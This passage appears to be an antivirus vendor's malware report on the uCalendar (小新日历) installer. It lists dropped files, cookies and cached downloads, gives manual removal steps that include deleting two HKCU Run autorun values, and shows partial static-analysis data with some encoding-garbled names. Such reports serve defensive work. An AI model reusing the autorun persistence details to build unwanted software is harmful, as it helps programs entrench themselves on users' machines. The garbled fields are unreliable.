    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G8JJ3.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A9JQ8.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S7KL5.tmp (555 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FGDDO.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UMDHA.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3C4AS.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFB1B.tmp (290 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J82M1.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2NU3.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OSOGC.tmp (399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IUPL8.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SAHIH.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IE9GS.tmp (7 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\小新日历\小新日历.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SBNVG.tmp (13 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\小新日历\访问 小新日历 官网.url (59 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-QT79M.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CC08P.tmp (523 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NV4JR.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3SAPP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V00NQ.tmp (408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G5L56.tmp (578 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-11QQC.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-97IOG.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0SJ8.tmp (706 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1PRVS.tmp (44 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJG3S.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RHLM.tmp (545 bytes)
    %Documents and Settings%\All Users\Desktop\ÎäÒ×´«Ææ.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8K221.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NMQV.tmp (511 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-76EL3.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-77Q9F.tmp (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-THFVL.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QI037.tmp (32054 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-453FH.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RSEVU.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.msg (298 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GDLU4.tmp (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BUO0T.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4U9TL.tmp (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T8AV0.tmp (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HIP4A.tmp (326 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPKRV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NB26.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HAV0P.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NFLP.tmp (524 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S4UJK.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ECGSQ.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BA97O.tmp (508 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-CR36B.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJ2MO.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GGFP6.tmp (663 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9B6IC.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7SN9K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H81BC.tmp (871 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S0HP8.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-UOMB9.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CQ2G0.tmp (680 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H454P.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNLME.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V0GI3.tmp (460 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6MUOK.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K6A4L.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J3A1P.tmp (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R3ENI.tmp (605 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OT7F7.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE59E.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N9TNV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F3GLM.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RPQTQ.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1BO97.tmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-EIJBG.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-224GL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16KT2.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-457SG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0RAC9.tmp (379 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L9R13.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VC40Q.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-134QI.tmp (37 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-12F6F.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EPU0G.tmp (450 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GR1F1.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J635K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-0RK1D.tmp (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0QAU.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U8HBE.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8CE4A.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-FG2A2.tmp (8281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LK4FU.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V625H.tmp (348 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-89JKG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-54RS6.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PVBA9.tmp (930 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-LQKHS.tmp (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-91HFL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7V3M5.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RR67N.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D5SAM.tmp (122 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T93Q7.tmp (978 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2QH3K.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UEO5K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-412CP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3HB2E.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7AIGQ.tmp (536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6C897.tmp (346 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2JDM2.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RAN83.tmp (450 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-01GK7.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\tj_get (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NU9MK.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D7GKR.tmp (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G4QOL.tmp (423 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L2QRQ.tmp (998 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D9EF4.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJMC9.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8SQ3K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ICSK7.tmp (442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B1VSJ.tmp (565 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H6UDG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-PL60I.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q5IHQ.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q9602.tmp (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6U4PP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3OV3S.tmp (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIQHK.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5OQO8.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ARCFV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[1].php (751 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD23K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U58P4.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SFKB5.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V4CEI.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B3HA8.tmp (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (1434 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GNV8E.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6FEFD.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-776D0.tmp (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-5H9QJ.tmp (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S6Q82.tmp (605 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16QRI.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SLEVI.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ABKJC.tmp (956 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3B5UH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TVVUF.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S26CD.tmp (479 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-CI790.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-94MCM.tmp (586 bytes)
    %Documents and Settings%\All Users\Desktop\ Intener Hao123.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DASMI.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8FIHU.tmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-Q84VT.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PGQ9B.tmp (183 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OQ3T0.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99VDN.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-3G7MO.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CJ1R8.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-U404O.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKH3C.tmp (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GQB0.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\webctrl.dll (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2FA4J.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6J672.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9UI34.tmp (248 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5B0J5.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S95AA.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IT5G9.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K8C4N.tmp (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GH8V2.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8O12A.tmp (822 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TMDND.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-D9BCS.tmp (97 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VJS7P.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NCEGP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VFH95.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MQF6A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (2149 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPNA1.tmp (421 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NML75.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IBNEQ.tmp (18 bytes)
    %Documents and Settings%\All Users\Desktop\小新日历.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V509A.tmp (313 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-POHV2.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4EA8J.tmp (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NICBF.tmp (247 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAK3A.tmp (382 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-394GB.tmp (1 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\小新日历\卸载 小新日历.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G0SMU.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\icon_9[1].gif (893 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CIVFE.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RERKV.tmp (530 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJF6C.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-C4IKR.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RK743.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7UBNI.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3LIFE.tmp (745 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-598FD.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EEJC5.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-41LLL.tmp (479 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\htmlinset1[1].txt (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\PopBoxSmall[1].txt (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FMTFilterinset[1].txt (108 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xxurl[1].htm (361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tmp[1].exe (48329 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[3].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[4].php (749 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\weather.dat (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\md5[1].txt (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uiconfig.txt (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qian[1].htm (102 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\tmp.exe (48329 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@down.xiaoxinrili[1].txt (224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[2].htm (488 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[3].php (751 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@count.xiaoxinrili[1].txt (206 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\uCalhtml[1].txt (34 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[2].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[2].php (751 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (393 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[2].php (1097 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\tclock.ini (184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\FMTFilterinset[1].txt (108 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[1].txt (412 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].txt (34 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Version[1].txt (1 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[2].txt (206 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Install.ini (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Install[1].txt (34 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[1].htm (552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\PopBoxBig[1].txt (11 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "riliquicken" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\riliquicken.exe apprun"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "riliRun" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe -run"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: ????
Product Name: ????
Product Version: 4.0
Legal Copyright: Copyright (c) 2012-2014 ????, Inc.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2014.1231.1429.17
File Description: ?????????????
Comments: This installation was built with Inno Setup.
Language: Language Neutral

Company Name: ????Product Name: ????Product Version: 4.0Legal Copyright: Copyright (c) 2012-2014 ????, Inc. Legal Trademarks: Original Filename: Internal Name: File Version: 2014.1231.1429.17 File Description: ?????????????Comments: This installation was built with Inno Setup.Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
